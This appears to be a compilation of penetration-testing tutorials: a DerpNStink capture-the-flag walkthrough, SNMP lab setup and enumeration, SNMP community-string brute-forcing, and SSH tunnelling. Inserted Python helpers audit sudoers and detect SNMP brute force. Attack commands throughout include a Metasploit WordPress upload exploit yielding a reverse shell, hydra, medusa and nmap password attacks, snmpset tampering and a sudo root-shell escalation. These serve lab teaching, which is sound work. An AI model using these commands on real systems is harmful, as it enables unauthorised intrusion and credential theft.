Hack the DerpNStink VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as DerpNStink. The credit for making this VM goes to “Bryan Smith”. It is another capture-the-flag challenge in which our goal is to capture all the flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here, I have it at but you will have to find your own).


Use nmap for port enumeration

nmap -p- -A --open

The nmap scan tells us that ports 21, 22 and 80 are open. As port 80 is running an HTTP server, we open the IP in our browser and run a dirb scan.


The dirb scan shows that the server has WordPress. When we open the /weblog/ directory we get redirected to derpnstink.local/weblog/.

So we add the domain name to our hosts file to get access to the site.

We first open the site using the domain name to check whether anything in the website has changed; when we take a look at the source code of the page we find our first flag.

Now when we open http://derpnstink.local/weblog we find that it is a WordPress site.

We use wpscan to enumerate the plugins, themes and users.

wpscan -u --enumerate at --enumerate ap --enumerate u

wpscan shows us that a plugin is exploitable.

We also find that the username and password are both admin.

We use Metasploit to exploit this vulnerability.

msf > use exploit/unix/webapp/wp_slideshowgallery_upload

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin

msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit

After getting a reverse shell we open wp-config.php and find the name of the database and the user required to access it.

We find the username and password required for MySQL.

We also find two directories we cannot access, which also hint at the usernames.

We use the information we found in the WordPress configuration file to log in through phpMyAdmin.

After logging in through phpMyAdmin, we find two hashes in the WordPress database.

We use John the Ripper to crack the hashes and find the password for stinky to be wedgie57.

When we log in to WordPress using the username stinky and password wedgie57, we find the 2nd flag.

We now log in to the system as user stinky with password wedgie57. Going through the system we find our 3rd flag. We also find a pcap file.

Enumerating the system we find a file called derpissues.txt that hints that we should use the pcap file we found earlier.

Going through the files we also found an SSH key, but we were unable to log in through SSH using this key.

Now we copy the pcap file into the FTP directory so that we can download it to our system through FTP.

We connect to the target machine through FTP and download the pcap file to our system.

After downloading the file we open it in Wireshark and find the password for the other user.

Now we log in as mrderp, take a look at the sudoers file and find that we can run, as root, any file matching /home/mrderp/binaries/derpy*.

To run our file as root we create a directory called binaries in /home/mrderp/.

Now we create a bash script that spawns a bash shell and save it as derpy.sh.

After creating the file we give it read, write and execute permissions and run it. As soon as we run the file we get a root shell. Going through the files in the /root/Desktop directory we find a file called flag.txt; when we open it we find our 4th flag.
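The sudoers entry above is exploitable because the glob sits inside a directory mrderp controls. The following audit script is an added example (not part of the write-up) that parses sudoers user specifications and flags exactly that pattern: wildcards in the command path, or a command path under the invoking user's own home; the sudoers text it checks is constructed.

```python
"""Audit sudoers command specs for the weakness exploited on this box: a glob such as
/home/mrderp/binaries/derpy* that lives under the invoking user's own home directory.
Added example, not part of the write-up; the sudoers text below is constructed."""
import re

# user  host=(runas) [TAG:] command[, command...]
SPEC = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")
GLOB_CHARS = set("*?[")

def parse_sudoers(text):
    """Yield (user, runas, command) for each user specification line."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # strip comments
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = re.sub(r"^(?:[A-Z]+:\s*)+", "", cmd.strip())  # drop NOPASSWD: etc.
            yield m.group("who"), m.group("runas") or "root", cmd

def audit(text):
    """Return (user, command, reason) findings: a wildcard in the command path, or a
    path inside the invoking user's home, either of which lets that user pick what
    actually runs as root."""
    findings = []
    for user, _runas, cmd in parse_sudoers(text):
        path = cmd.split()[0]
        if path == "ALL":
            continue  # nothing to pattern-check for ALL; review those separately
        if GLOB_CHARS & set(path):
            findings.append((user, cmd, "wildcard in command path"))
        if not user.startswith("%") and path.startswith("/home/%s/" % user):
            findings.append((user, cmd, "command under invoking user's home"))
    return findings

# Constructed sample mirroring the entry found on the box, plus a tighter one.
SAMPLE = """
Defaults env_reset
root    ALL=(ALL:ALL) ALL
mrderp  ALL=(ALL) NOPASSWD: /home/mrderp/binaries/derpy*   # the weak entry
stinky  ALL=(root) /usr/bin/systemctl restart apache2
"""
```

Running `audit(SAMPLE)` reports the mrderp line twice (wildcard and home-directory path) and nothing for the stinky line, which names one fixed binary under /usr/bin.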

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

SNMP Lab Setup and Penetration Testing

What is SNMP?

Simple Network Management Protocol (SNMP) is a protocol for network management. It is used for collecting information from, and configuring, network devices such as servers, printers, hubs, switches and routers on an Internet Protocol (IP) network. It usually runs on UDP port 161.

Download Vyos Link: https://downloads.vyos.io/?dir=release/1.1.8

Create a new virtual machine in VMware and change the Network Adapter to Bridged, as shown in the screenshot.

After completing the initial setup in VMware, boot the newly created virtual machine by clicking on Power on this virtual machine.

The default login credentials for VyOS are

Username: vyos

Password: vyos

The initial boot of VyOS will look as shown below:

This is a live boot of VyOS, so we will install VyOS to use it properly.

We will use the ISO image to install VyOS. Type the following command:

Command: install image

Enter “Yes” where it asks to continue.

Next it will ask about partition management.

Enter “Auto” where it asks about the partition.

It will detect the drives in the virtual system and ask you to select the drive on which you want to install VyOS.

Enter “sda” where it asks about the location for installation.

Next it will ask about the size of the root partition for VyOS.

You can enter any size from 1000MB to 21474MB, but it is recommended to keep it at the maximum, i.e. 21474MB.

Next it will ask about the name for the image.

By default the name is set to the version number, that is 1.1.8. You can either give it a personalised name or leave it at the default.

Next it will ask what to copy to sda.

It is recommended to keep it at the default.

After that it will ask for the password to be set for the administrator account.

By default it is vyos, but from a security point of view it is recommended to change it to something complex which is difficult to guess or brute-force.

Now it will ask on which drive you want to set up the GRUB boot loader. Again, leave it at the default, “sda”.

With that the VyOS setup is complete. Reboot using the command

Command: reboot

After the reboot it will ask for login credentials; enter the credentials that you set during the installation.

Now we will configure the network interface. To do that, we will have to enter configuration mode.

Command: configure

After entering configuration mode, set up the network interface:

Syntax: set interfaces ethernet [network interface] address [Static IPv4 Address]

Command: set interfaces ethernet eth0 address

Now commit and save the configuration

Command: commit

Command: save

After that type “exit” to leave configuration mode and then reboot the machine using the “reboot” command.

We are rebooting because the configuration changes take effect only after a reboot.

You can view the interface we configured by using the command

Command: show interfaces

Note: The above command will run in configuration mode.

Start SNMP service

Now we will set up the SNMP service in VyOS.

For that we will enter configuration mode using the command

Command: configure

Now, to set up the SNMP service, we will need to add a community string and give it an authorization. To do that:

Syntax: set service snmp community [community-string] authorization [auth-mode]

[community-string]: It can be anything, but normally it is either public or private. From a security point of view it is recommended to use something that cannot be easily guessed or brute-forced.

[auth-mode]: It is the authorization mode. We have two options

  1. [ro]: Read-only authorization (it can only be used to read or extract data; we cannot change anything using this string)
  2. [rw]: Read-write authorization (it can be used to change data using this string)

Command: set service snmp community ignite123 authorization ro

Command: set service snmp community ignite123 authorization rw

Now let’s set up a user for the system.

First, enter configuration mode.

Command: configure

Now, to add a user, we will use the following command:

Syntax: set system login user [username] authentication plaintext-password [password]

Command: set system login user ignite authentication plaintext-password ignite123

After this, commit the configuration and save it. Also reboot the machine so that the changes take effect.

We have successfully completed the SNMP lab in VyOS.

SNMP Enumeration using Kali Linux

Now that we have set up an SNMP service, let’s pentest it with the tools built into Kali Linux, one by one. We can read and extract information using the community string that has read-only authorization, but to change information we will have to use the community string with read-write authorization.


Let’s check using nmap from a Kali Linux machine running on the same network.

nmap -sU -p 161,162

[-sU]: UDP ports, as the SNMP service runs over UDP

[-p]: Specify port numbers; the SNMP service uses ports 161 and 162

From the image below you can observe that it shows port 161 as open.


snmpwalk is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information.

Command: snmpwalk -v1 -c ignite321


[-v1]: Level of verbose mode

[-c]: Community String

From the image below you can observe all the details that are specified as “STRING”.


We can manipulate these details using the ISO ID with another tool, snmpset. Here we are renaming the host string from vyos to hacked.

Command: snmpset -v1 -c ignite321 iso. hacked

Let’s check whether the changes we made had an effect, using snmpwalk

Command: snmpwalk -v1 -c ignite321

As you can see, we have successfully changed the host name from vyos to hacked.

We can extract a wide range of information using snmpwalk

Command: snmpwalk -v1 -c ignite321

Command: snmpwalk -v1 -c ignite321

Command: snmpwalk -v1 -c ignite321

As the data extracted by snmpwalk is quite large, we can redirect it into a text file with the command below

Command: snmpwalk -v1 -c ignite321 > snmpout.txt

We can use gedit to view the extracted information

Command: gedit snmpout.txt


Like snmpwalk, snmp-check allows you to enumerate SNMP devices and places the output in a very human-readable format. It could be useful for penetration testing or systems monitoring.

Command: snmp-check -p 161 -c ignite123


[-p]: To specify port

[-c]: To specify Community String


Braa is a mass SNMP scanner. The intended usage of such a tool is of course making SNMP queries, but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus it consumes very few system resources and does the scanning very fast.

Braa implements its own SNMP stack, so it does not need any SNMP libraries such as net-snmp.

Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]

Command: braa [email protected]:.1.3.6.*


We can enumerate SNMP using a Metasploit module called snmp_enum.

use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(scanner/snmp/snmp_enum) > set rhosts

msf auxiliary(scanner/snmp/snmp_enum) > set community ignite123

msf auxiliary(scanner/snmp/snmp_enum) > run

We have fetched the same result from Metasploit as above.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

6 Ways to Hack SNMP Password

In this article, we will learn how to gain control over our victim’s SNMP service. There are various ways to do it; let’s take the time to learn all of them, because different circumstances call for different measures.


Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, FTP, HTTP, HTTPS, SMB, several databases, and much more.

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -P /root/Desktop/pass.txt snmp

-P: denotes the path to the password list

Once the command is executed it will start the dictionary attack, and you will have the right credentials in no time. As you can observe, we successfully grabbed the SNMP password, ignite123.


This is the graphical way to apply a dictionary attack via the SNMP port to hack a system. For this method to work:

Open xHydra in your Kali. Select the Single Target option and there give the IP of your victim PC. Select SNMP in the box against the Protocol option and give port number 161 against the Port option.

Now go to the Passwords tab and in the Username section check the box adjacent to “Protocol doesn’t require username”.

Then select Password List and give the path of your text file containing all the passwords in the box adjacent to it.

Now go to the Specific tab and clear the data written in the text box below SNMP, as shown in the screenshot.

When you have cleared all the entries it will look as shown in the next image below.

After doing this, go to the Start tab and click the Start button on the left.

Now the dictionary attack will start, and you will obtain the password of your victim.

As you can see, we have cracked the password ignite123.


Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, SNMP and VNC, to name a few.

Run the following command

medusa -M snmp -h -u ignite -P /root/Desktop/pass.txt


-h: denotes the host IP

-u: denotes a particular user

Brute-forcing SNMP doesn’t require a username, but Medusa doesn’t run without the full syntax, so you can use any username of your choice.

-P: denotes the path to the password list

As you can observe, we successfully grabbed the SNMP password, ignite123.


This module tests SNMP logins on a range of machines and reports successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.

Open a Kali terminal and type msfconsole

Now type use auxiliary/scanner/snmp/snmp_login

msf auxiliary(scanner/snmp/snmp_login)> set rhosts (IP of Remote Host)

msf auxiliary(scanner/snmp/snmp_login)> set pass_file  /root/Desktop/pass.txt

msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true

msf auxiliary(scanner/snmp/snmp_login)> run

From the image below you can observe that we successfully grabbed the SNMP password.


We can also crack the SNMP password using nmap; execute the command below.

nmap -sU -p 161 -n --script snmp-brute --script-args snmp-brute.communitiesdb=/root/Desktop/pass.txt

As you can see above, we have cracked the password ignite123.


Onesixtyone is an SNMP scanner that sends multiple SNMP requests to multiple IP addresses, trying different community strings and waiting for replies.

onesixtyone -c /root/Desktop/pass.txt

As you can see above, we have cracked the password ignite123 using onesixtyone.
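Every tool in this section, and snmpwalk in the previous article, sends the same SNMPv1 message: a version, a community string and a PDU, BER-encoded into one UDP datagram. The following added example (not code from either article) builds that GetNextRequest, parses the header back out of raw payloads, and shows the detection side: a host that sends many distinct community strings, as hydra or onesixtyone do, stands out from a host walking with one. The packets, addresses and wordlist here are constructed.

```python
"""SNMPv1 encoding, header parsing and community-string brute-force detection.
Added example (not the articles' own code): builds the GetNextRequest that snmpwalk
sends, reads version/community/PDU type out of raw UDP payloads, and flags a source
trying many distinct communities (hydra/onesixtyone traffic). Sample data is constructed."""
from collections import defaultdict

INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30  # BER tags (RFC 1157)
GET_NEXT_REQUEST = 0xA1  # context-specific, constructed, tag number 1

def tlv(tag, body):
    """Short-form BER type-length-value; enough for requests under 128 bytes."""
    assert len(body) < 128, "long-form length not needed for these requests"
    return bytes([tag, len(body)]) + body

def encode_int(v):  # non-negative only; a leading 0x00 keeps the sign bit clear
    return tlv(INTEGER, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big"))

def encode_oid(oid):
    nums = [int(x) for x in oid.strip(".").split(".")]
    out = [nums[0] * 40 + nums[1]]  # first two arcs share one byte
    for n in nums[2:]:  # base-128, continuation bit set on all but the last byte
        chunk = [n & 0x7F]
        while n > 0x7F:
            n >>= 7
            chunk.insert(0, (n & 0x7F) | 0x80)
        out += chunk
    return tlv(OID, bytes(out))

def get_next_request(community, oid, request_id=1):
    """SNMPv1 GetNextRequest for one OID, as `snmpwalk -v1 -c <community>` sends."""
    varbind = tlv(SEQUENCE, encode_oid(oid) + tlv(NULL, b""))
    pdu = tlv(GET_NEXT_REQUEST, encode_int(request_id) + encode_int(0)  # error-status
              + encode_int(0) + tlv(SEQUENCE, varbind))              # error-index
    return tlv(SEQUENCE, encode_int(0) + tlv(OCTET_STRING, community.encode()) + pdu)

def read_tlv(buf, pos):
    """Return (tag, value_bytes, next_pos); handles long-form lengths in replies."""
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:
        k = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + ln], pos + ln

def parse_header(payload):
    """Extract (version, community, pdu_tag) from a raw SNMP UDP payload."""
    tag, msg, _ = read_tlv(payload, 0)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    _, ver, p = read_tlv(msg, 0)
    _, comm, p = read_tlv(msg, p)
    return int.from_bytes(ver, "big"), comm.decode(errors="replace"), read_tlv(msg, p)[0]

def brute_force_sources(packets, threshold=5):
    """packets: iterable of (src_ip, payload). Returns {src: distinct communities}
    for sources above the threshold; a legitimate walk uses a single community."""
    seen = defaultdict(set)
    for src, payload in packets:
        try:
            seen[src].add(parse_header(payload)[1])
        except (ValueError, IndexError):
            continue  # not SNMP or truncated: ignore
    return {src: len(c) for src, c in seen.items() if len(c) > threshold}

# Constructed sample traffic: one host walking with the lab community, one guessing.
WALK = [("10.0.0.5", get_next_request("ignite123", "1.3.6.1.2.1.1", i)) for i in range(8)]
GUESSING = [("10.0.0.9", get_next_request(w, "1.3.6.1.2.1.1.1.0"))
            for w in ["public", "private", "manager", "admin", "cisco", "ignite123"]]
```

`brute_force_sources(WALK + GUESSING)` returns only the guessing host; feeding it payloads captured on UDP/161 from a real interface gives the same per-source view of a wordlist attack.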


Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

Comprehensive Guide to SSH Tunnelling

Basically, tunnelling is a process which allows data sharing or communication between two different networks privately. Tunnelling is normally performed by encapsulating the private network’s data and protocol information inside the public network’s transmission units, so that the private network protocol information is visible to the public network only as data.

SSH Tunnel: Tunnelling is the concept of encapsulating one network protocol inside another; here we put it inside SSH, so all network communication is encrypted. Because tunnelling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.

Types of SSH Tunneling:

  1. Dynamic SSH tunneling
  2. Local SSH tunneling
  3. Remote SSH tunneling

Let’s Begin!!

Objective: To establish an SSH connection between a remote PC and a local system on a different network.

Here I have set up my own lab, which consists of three systems in the following network:

  • SSH server (two Ethernet interfaces): one IP connected with the remote system and one IP connected to the local network system
  • SSH client (local network): holds IP
  • Remote system (outside the network)

In the following image we are trying to explain the SSH tunnelling process, where a remote PC is trying to connect to a system which is on the intranet of another network. To establish a connection with the SSH client (raj), the remote PC will create an SSH tunnel which will connect with the local system via the SSH server (Ignite).

NOTE: The SSH service must be running.


The image below describes the network configuration for the SSH server, showing its two IPs, and another.

The next image describes the network configuration for the SSH client, showing its IP.

Dynamic SSH Tunneling through Windows

The remote PC is trying to connect to the SSH server ( ) via port 22 and gets a successful login to the server. Here we used PuTTY for establishing the connection between the SSH server (Ubuntu) and the remote user (Windows).

Similarly, the remote PC now tries to connect with the client PC ( ) via port 22; since they belong to different networks, it receives a network error.

Steps for dynamic SSH tunnelling

  • Choose the option SSH > Tunnel given in the left column of Category.
  • Give the new forwarded port as 7000 and the connection type as Dynamic, and click Add at last.

Now connect to the SSH server via port 22 and then click Open when everything is set.

First it will connect to the SSH server; as you can see, we are connected with the SSH server (Ignite).

Now open PuTTY again and give the IP of the client system as Host Name and port 22 for SSH, then click Open.

In the previously running PuTTY window choose the Proxy option from Category and follow the steps below:

  • Select the proxy type as SOCKS 5
  • Give the proxy hostname as and the port as 7000
  • Click Open to establish the connection.

Awesome!! We have successfully accessed the SSH client (raj) via port 7000.

Dynamic SSH Tunneling through Kali Linux on Port 80

Now we are using Kali Linux for SSH tunnelling and demonstrating how an attacker or Linux user can take advantage of tunnelling to establish an SSH connection with client systems.

ssh -D 7000 [email protected]

Enter the user’s password to log in and get access to the SSH server, as shown below.

Next we need to set a network proxy to enable SOCKS v5; for that, follow the steps below.

  • In your web browser (Firefox) go to the General settings tab and open Network Proxy.
  • Choose No Proxy
  • Enable SOCKS v5

Add localhost, as the manual proxy

So from the image below you can see that we are now able to connect with the client via port 80.

Dynamic SSH Tunneling through Kali Linux on Port 22

Now connect to the client machine through the command below:

ssh -D 7000 [email protected]

Install tsocks from the apt repository using the command: apt install tsocks.

tsocks: a library for intercepting outgoing network connections and redirecting them through a SOCKS server.

Open the tsocks.conf file to edit the SOCKS server IP and port; in our case we need to set the two lines below and then save it.

Server =

Server_port = 7000

Now connect to the SSH client with the help of tsocks using the command below.

tsocks ssh [email protected]

Enter the password and enjoy access to the SSH client.
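What Firefox and tsocks actually do against the `ssh -D 7000` listener is a SOCKS5 handshake (RFC 1928): a method negotiation, then a CONNECT request naming the final destination, which sshd resolves and opens from the server's side of the tunnel. The following added example (not the article's code) builds and parses those messages; the proxy address 127.0.0.1:7000 matches the setup above, and the reply bytes in the test are constructed rather than captured.

```python
"""SOCKS5 CONNECT handshake as performed against the ssh -D 7000 listener.
Added example, not the article's code: builds the two client messages that Firefox
or tsocks send to 127.0.0.1:7000 and parses the proxy's replies. Sample reply bytes
used for checking are constructed, not captured from a live tunnel."""
import ipaddress
import socket
import struct

def greeting():
    """Version 5, one offered method: 0x00 = no authentication (what ssh -D accepts)."""
    return b"\x05\x01\x00"

def parse_method_reply(data):
    ver, method = struct.unpack("!BB", data[:2])
    if ver != 5 or method == 0xFF:
        raise ValueError("proxy rejected the handshake")
    return method

def connect_request(host, port):
    """CMD=1 CONNECT. ATYP 1 = IPv4 literal; ATYP 3 = domain name, which the proxy
    (sshd) resolves on the far side, so even DNS lookups stay inside the tunnel."""
    try:
        addr = b"\x01" + ipaddress.IPv4Address(host).packed
    except ipaddress.AddressValueError:
        name = host.encode()
        addr = b"\x03" + bytes([len(name)]) + name
    return b"\x05\x01\x00" + addr + struct.pack("!H", port)

REPLY_CODES = {0: "succeeded", 1: "general failure", 2: "not allowed by ruleset",
               3: "network unreachable", 4: "host unreachable", 5: "connection refused"}

def parse_connect_reply(data):
    """Return (status_text, bound_addr, bound_port) from the proxy's CONNECT reply."""
    ver, rep, _, atyp = struct.unpack("!BBBB", data[:4])
    if ver != 5:
        raise ValueError("not a SOCKS5 reply")
    if atyp == 1:
        bound, rest = str(ipaddress.IPv4Address(data[4:8])), data[8:]
    elif atyp == 3:
        n = data[4]
        bound, rest = data[5:5 + n].decode(), data[5 + n:]
    else:
        raise ValueError("unsupported address type %d" % atyp)
    return REPLY_CODES.get(rep, "unknown"), bound, struct.unpack("!H", rest[:2])[0]

def tunnel_connect(dest_host, dest_port, proxy=("127.0.0.1", 7000)):
    """Full handshake over a live socket; returns the connected socket, which then
    carries the application protocol (SSH, HTTP) to dest_host through the tunnel."""
    s = socket.create_connection(proxy)
    s.sendall(greeting())
    parse_method_reply(s.recv(2))
    s.sendall(connect_request(dest_host, dest_port))
    status, _, _ = parse_connect_reply(s.recv(262))  # 262 = largest possible reply
    if status != "succeeded":
        s.close()
        raise ConnectionError(status)
    return s
```

A reply code other than 0 from `parse_connect_reply` means the SSH server itself could not reach the destination, which is the error to look at when a tunnelled connection fails silently in the browser.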

Local SSH Tunneling through Windows

Local tunnelling is a process to access a specific SSH client machine for communication. It lets you establish a connection to a specific machine which is not reachable from the internet.

The only difference between dynamic tunnelling and local tunnelling is that dynamic tunnelling requires a SOCKS proxy for tunnelling all TCP traffic, whereas local tunnelling only requires the destination IP address.

Steps for SSH local tunnelling

  • Use PuTTY to connect to the SSH server ( ) via port 22 and choose the option SSH > Tunnel given in the left column of Category.
  • Give the new forwarded port as 7000 and the connection type as Local
  • Give the destination address as for establishing a connection with the specific client, and click Add at last.
  • Click Open when everything is set.

First this will establish the connection between the remote PC and the SSH server.

Open a new PuTTY window and follow the steps below:

  • Give the hostname as localhost, port 7000 and connection type SSH.
  • Click Open to establish the connection.

Awesome!! We have successfully accessed the SSH client via port 7000.

Local SSH Tunneling through Kali Linux

Now again we switch to Kali Linux for local tunnelling, which is quite easy compared to dynamic. Execute the command below to forward the port to the local machine.

ssh -L 7000: [email protected]

Now open a new terminal and type the command below to connect to the SSH client.

ssh [email protected] -p 7000

Awesome!! We have successfully accessed the SSH client via port 7000.

Remote SSH Tunneling through Putty

Remote tunnelling is useful when a client machine wants to access a remote system which is outside its network.

First we need to install PuTTY on our SSH server (ignite) and then follow the given steps.

Steps for remote tunnelling

  • Enter the remote system IP
  • Mention port 22
  • Go to the SSH > Tunnel options
  • Give the new forwarded port as 7000 and the connection type as Remote
  • Give the destination address as for establishing a connection with the specific client, and click Add at last.
  • Click Open when everything is set.

Now the server will get connected to the remote system as shown in the image below.

Come back to the remote system and enter the following command to connect with the SSH client machine.

ssh [email protected] -p 7000

From the image below you can observe that we have successfully connected with the SSH client machine via port 7000.

Remote SSH Tunneling through Ubuntu

If you do not wish to use PuTTY for remote tunnelling, then you can execute the following command

ssh -R 7000: [email protected]

Here is our local client (raj) IP and is our remote system IP.

Come back to the remote system and enter the following command to connect with the SSH client machine.

ssh [email protected] -p 7000

From the image below you can observe that we have successfully connected with the SSH client machine via port 7000.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here
